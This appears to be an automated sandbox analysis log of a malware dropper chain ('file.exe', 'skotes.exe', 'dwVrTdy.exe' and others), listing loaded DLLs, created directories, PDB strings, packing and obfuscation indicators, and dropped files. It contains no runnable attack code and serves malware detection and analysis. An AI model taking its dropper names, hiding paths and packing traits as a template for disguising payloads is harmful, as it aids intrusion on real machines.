                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                      Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                      Source: Cleaner.lnk.22.drLNK file: ..\AppData\Local\Temp\9D01A5Jfed0VtJf6\Y-Cleaner.exe
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeDirectory created: C:\Program Files\Google\Chrome\ExtensionsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzipJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeDirectory created: C:\Program Files\Windows Media Player\graphJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeDirectory created: C:\Program Files\Windows Media Player\graph\graph.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzipJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzipJump to behavior
                      Source: file.exeStatic file information: File size 3189248 > 1048576
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: file.exeStatic PE information: Raw size of sfctgzqb is bigger than: 0x100000 < 0x29ee00
                      Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2412707099.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2413257416.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: F0A3.tmp.ctx.exe, 0000001F.00000003.2402065480.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb% source: dwVrTdy.exe, 00000009.00000003.2123748966.000001B9CFD20000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 0000000C.00000000.2123985997.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 0000000C.00000002.2145233221.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 0000000E.00000000.2144190009.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 0000000F.00000000.2184398416.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 00000015.00000000.2210905809.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 0000001C.00000000.2376475392.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp
                      Source: Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2402307730.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2403438920.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ucrtbase.pdb source: F0A3.tmp.ctx.exe, 00000027.00000002.2494789208.00007FF821D65000.00000002.00000001.01000000.00000014.sdmp
                      Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2407734052.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb[ source: dwVrTdy.exe, 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 00000009.00000000.2012245571.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000000.2029600049.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000002.2184962694.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, AzVRM7c.exe, 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, AzVRM7c.exe, 0000000B.00000000.2075857179.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, t5abhIx.exe, 0000000D.00000002.2204343711.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp, t5abhIx.exe, 0000000D.00000000.2140730491.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2402997907.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2401908303.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2411298731.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2412401802.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2413433543.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\A\21\b\bin\amd64\_ctypes.pdb source: F0A3.tmp.ctx.exe, 00000027.00000002.2498270085.00007FF838AC1000.00000002.00000001.01000000.00000017.sdmp
                      Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2404034326.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2411720921.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2410685858.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2401529035.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2412236687.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2403127092.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: vcruntime140.amd64.pdbGCTL source: F0A3.tmp.ctx.exe, 0000001F.00000003.2401331620.00000234A0E30000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000002.2500759273.00007FF838AFE000.00000002.00000001.01000000.00000016.sdmp
                      Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2408261086.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2402461321.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2403281941.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2412064565.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\A\21\b\bin\amd64\select.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2408717409.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ucrtbase.pdbUGP source: F0A3.tmp.ctx.exe, 00000027.00000002.2494789208.00007FF821D65000.00000002.00000001.01000000.00000014.sdmp
                      Source: Binary string: vcruntime140.amd64.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2401331620.00000234A0E30000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000002.2500759273.00007FF838AFE000.00000002.00000001.01000000.00000016.sdmp
                      Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2413918050.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2403748215.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2411113036.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2408039545.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2402824142.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2411883189.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\A\21\b\bin\amd64\python38.pdb source: F0A3.tmp.ctx.exe, 00000027.00000002.2482728285.00007FF8209FD000.00000002.00000001.01000000.00000015.sdmp
                      Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2402065480.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2407574010.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2412918529.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2408438351.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2407874978.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2414099515.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2408870662.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2411536090.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2409067450.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2403603084.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2413097007.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb source: dwVrTdy.exe, 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 00000009.00000000.2012245571.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000000.2029600049.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000002.2184962694.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, AzVRM7c.exe, 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, AzVRM7c.exe, 0000000B.00000000.2075857179.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, t5abhIx.exe, 0000000D.00000002.2204343711.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp, t5abhIx.exe, 0000000D.00000000.2140730491.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2407216629.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2406846700.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E3A000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb source: dwVrTdy.exe, 00000009.00000003.2123748966.000001B9CFD20000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 0000000C.00000000.2123985997.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 0000000C.00000002.2145233221.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 0000000E.00000000.2144190009.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 0000000F.00000000.2184398416.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 00000015.00000000.2210905809.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 0000001C.00000000.2376475392.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp
                      Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2412551872.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2413689058.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.240000.0.unpack :EW;.rsrc:W;.idata :W;sfctgzqb:EW;qkipfcli:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;sfctgzqb:EW;qkipfcli:EW;.taggant:EW;
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 2.2.skotes.exe.fb0000.0.unpack :EW;.rsrc:W;.idata :W;sfctgzqb:EW;qkipfcli:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;sfctgzqb:EW;qkipfcli:EW;.taggant:EW;
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 3.2.skotes.exe.fb0000.0.unpack :EW;.rsrc:W;.idata :W;sfctgzqb:EW;qkipfcli:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;sfctgzqb:EW;qkipfcli:EW;.taggant:EW;
                      Source: FBFF.tmp.fcxcx.exe.20.drStatic PE information: 0xD22848DC [Tue Sep 23 12:17:32 2081 UTC]
                      Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                      Source: d8d3046b98.exe.7.drStatic PE information: real checksum: 0x1c8d79 should be: 0x1c789b
                      Source: random[1].exe1.7.drStatic PE information: real checksum: 0x2b3972 should be: 0x2afd66
                      Source: AzVRM7c[1].exe.7.drStatic PE information: real checksum: 0x0 should be: 0x9f7ff
                      Source: u1w30Wt[1].exe.7.drStatic PE information: real checksum: 0x0 should be: 0x53987
                      Source: Y-Cleaner.exe.22.drStatic PE information: real checksum: 0x0 should be: 0x170243
                      Source: graph.exe.9.drStatic PE information: real checksum: 0x0 should be: 0x46f82
                      Source: FBFF.tmp.fcxcx.exe.20.drStatic PE information: real checksum: 0x0 should be: 0x4c2ca
                      Source: dll[1].22.drStatic PE information: real checksum: 0x0 should be: 0x400e1
                      Source: dwVrTdy[1].exe.7.drStatic PE information: real checksum: 0x0 should be: 0x9f7ff
                      Source: random[2].exe1.7.drStatic PE information: real checksum: 0x1c8d79 should be: 0x1c789b
                      Source: skotes.exe.0.drStatic PE information: real checksum: 0x3130ea should be: 0x30e978
                      Source: AzVRM7c.exe.7.drStatic PE information: real checksum: 0x0 should be: 0x9f7ff
                      Source: be08f59021.exe.7.drStatic PE information: real checksum: 0x1ec2f5 should be: 0x1ef516
                      Source: dwVrTdy.exe.7.drStatic PE information: real checksum: 0x0 should be: 0x9f7ff
                      Source: random[1].exe.7.drStatic PE information: real checksum: 0x1ec2f5 should be: 0x1ef516
                      Source: 3417.tmp.vvv.exe.20.drStatic PE information: real checksum: 0x0 should be: 0x2f2df6
                      Source: t5abhIx.exe.7.drStatic PE information: real checksum: 0x0 should be: 0x9f7ff
                      Source: 2DB3A69DE7692371543510.exe.16.drStatic PE information: real checksum: 0x0 should be: 0x53987
                      Source: u1w30Wt.exe.7.drStatic PE information: real checksum: 0x0 should be: 0x53987
                      Source: t5abhIx[1].exe.7.drStatic PE information: real checksum: 0x0 should be: 0x9f7ff
                      Source: 9774053d4c.exe.7.drStatic PE information: real checksum: 0x2b3972 should be: 0x2afd66
                      Source: file.exeStatic PE information: real checksum: 0x3130ea should be: 0x30e978
                      Source: soft[1].22.drStatic PE information: real checksum: 0x0 should be: 0x170243
                      Source: Bunifu_UI_v1.5.3.dll.22.drStatic PE information: real checksum: 0x0 should be: 0x400e1
                      Source: file.exeStatic PE information: section name:
                      Source: file.exeStatic PE information: section name: .idata
                      Source: file.exeStatic PE information: section name: sfctgzqb
                      Source: file.exeStatic PE information: section name: qkipfcli
                      Source: file.exeStatic PE information: section name: .taggant
                      Source: skotes.exe.0.drStatic PE information: section name:
                      Source: skotes.exe.0.drStatic PE information: section name: .idata
                      Source: skotes.exe.0.drStatic PE information: section name: sfctgzqb
                      Source: skotes.exe.0.drStatic PE information: section name: qkipfcli
                      Source: skotes.exe.0.drStatic PE information: section name: .taggant
                      Source: random[2].exe1.7.drStatic PE information: section name:
                      Source: random[2].exe1.7.drStatic PE information: section name: .idata
                      Source: random[2].exe1.7.drStatic PE information: section name:
                      Source: random[2].exe1.7.drStatic PE information: section name: tdoajogz
                      Source: random[2].exe1.7.drStatic PE information: section name: xfulpslq
                      Source: random[2].exe1.7.drStatic PE information: section name: .taggant
                      Source: d8d3046b98.exe.7.drStatic PE information: section name:
                      Source: d8d3046b98.exe.7.drStatic PE information: section name: .idata
                      Source: d8d3046b98.exe.7.drStatic PE information: section name:
                      Source: d8d3046b98.exe.7.drStatic PE information: section name: tdoajogz
                      Source: d8d3046b98.exe.7.drStatic PE information: section name: xfulpslq
                      Source: d8d3046b98.exe.7.drStatic PE information: section name: .taggant
                      Source: u1w30Wt[1].exe.7.drStatic PE information: section name: .x64
                      Source: u1w30Wt.exe.7.drStatic PE information: section name: .x64
                      Source: random[1].exe.7.drStatic PE information: section name:
                      Source: random[1].exe.7.drStatic PE information: section name: .idata
                      Source: random[1].exe.7.drStatic PE information: section name:
                      Source: random[1].exe.7.drStatic PE information: section name: ehftnwgk
                      Source: random[1].exe.7.drStatic PE information: section name: unlnktmr
                      Source: random[1].exe.7.drStatic PE information: section name: .taggant
                      Source: be08f59021.exe.7.drStatic PE information: section name:
                      Source: be08f59021.exe.7.drStatic PE information: section name: .idata
                      Source: be08f59021.exe.7.drStatic PE information: section name:
                      Source: be08f59021.exe.7.drStatic PE information: section name: ehftnwgk
                      Source: be08f59021.exe.7.drStatic PE information: section name: unlnktmr
                      Source: be08f59021.exe.7.drStatic PE information: section name: .taggant
                      Source: random[1].exe1.7.drStatic PE information: section name:
                      Source: random[1].exe1.7.drStatic PE information: section name: .idata
                      Source: random[1].exe1.7.drStatic PE information: section name: nwmnxdbs
                      Source: random[1].exe1.7.drStatic PE information: section name: esrtnfgg
                      Source: random[1].exe1.7.drStatic PE information: section name: .taggant
                      Source: 9774053d4c.exe.7.drStatic PE information: section name:
                      Source: 9774053d4c.exe.7.drStatic PE information: section name: .idata
                      Source: 9774053d4c.exe.7.drStatic PE information: section name: nwmnxdbs
                      Source: 9774053d4c.exe.7.drStatic PE information: section name: esrtnfgg
                      Source: 9774053d4c.exe.7.drStatic PE information: section name: .taggant
                      Source: 2DB3A69DE7692371543510.exe.16.drStatic PE information: section name: .x64
                      Source: 3417.tmp.vvv.exe.20.drStatic PE information: section name: UPX2
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0025D91C push ecx; ret 0_2_0025D92F
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00251359 push es; ret 0_2_0025135A
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00FCD91C push ecx; ret 2_2_00FCD92F
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00FCD91C push ecx; ret 3_2_00FCD92F
                      Source: file.exeStatic PE information: section name: entropy: 7.111669260859514
                      Source: skotes.exe.0.drStatic PE information: section name: entropy: 7.111669260859514
                      Source: random[2].exe1.7.drStatic PE information: section name: tdoajogz entropy: 7.9526002407712415
                      Source: d8d3046b98.exe.7.drStatic PE information: section name: tdoajogz entropy: 7.9526002407712415
                      Source: random[1].exe.7.drStatic PE information: section name: ehftnwgk entropy: 7.94243036954353
                      Source: be08f59021.exe.7.drStatic PE information: section name: ehftnwgk entropy: 7.94243036954353
                      Source: random[1].exe1.7.drStatic PE information: section name: entropy: 7.803165532767096
                      Source: 9774053d4c.exe.7.drStatic PE information: section name: entropy: 7.803165532767096
                      Source: Y-Cleaner.exe.22.drStatic PE information: section name: .text entropy: 7.918511524700298
                      Source: soft[1].22.drStatic PE information: section name: .text entropy: 7.918511524700298
                      Source: initial sampleStatic PE information: section name: UPX0
                      Source: initial sampleStatic PE information: section name: UPX1

                      Persistence and Installation Behavior

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].pngJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\json[1].jsonJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\sendMessage[1].jsonJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\dll[1]Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\soft[1]Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\python38.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\_lzma.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\random[2].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\random[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\libcrypto-1_1.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\AzVRM7c[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\msvcp140[1].dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\u1w30Wt[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\random[2].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\random[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI36402\select.pydJump to dropped file
